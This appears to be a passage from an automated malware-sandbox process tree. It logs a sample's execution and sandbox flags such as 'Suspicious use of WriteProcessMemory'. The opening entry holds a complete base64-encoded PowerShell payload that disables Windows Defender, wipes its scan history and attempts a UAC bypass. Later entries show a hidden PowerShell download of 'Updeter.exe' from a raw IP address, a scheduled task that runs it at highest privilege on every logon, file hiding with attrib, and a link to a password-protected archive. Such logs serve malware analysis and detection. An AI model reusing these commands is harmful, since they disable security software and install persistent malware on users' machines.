"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
9⤵
- Launches sc.exe
PID:5040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
9⤵
PID:1216

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
9⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"' & exit
8⤵
PID:4316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Users\Admin\AppData\Local\Temp\Updeter.exe
"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
10⤵
- Executes dropped EXE
- Checks computer location settings
PID:3232

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\899D.tmp\899E.tmp\899F.bat C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
11⤵
PID:4028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w Hidden -ExecutionPolicy Bypass -c "Invoke-WebRequest -URI "http://20.127.168.10/assets/Updeter.exe" -OutFile "C:\Users\Admin\AppData\Roaming/Updeter.exe"
12⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w Hidden -ExecutionPolicy Bypass -c "schtasks /create /tn ChromeUpdeter /tr "C:\Users\Admin\AppData\Roaming/Updeter.exe" /sc onlogon /rl highest"
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn ChromeUpdeter /tr C:\Users\Admin\AppData\Roaming/Updeter.exe /sc onlogon /rl highest
13⤵
- Creates scheduled task(s)
PID:228

C:\Windows\system32\timeout.exe
timeout /t 30 /nobreak
12⤵
- Delays execution with timeout.exe
PID:4540

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\AppData\Roaming\*.exe
12⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff8317646f8,0x7ff831764708,0x7ff831764718
5⤵
PID:1276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
5⤵
PID:4820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
5⤵
PID:820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
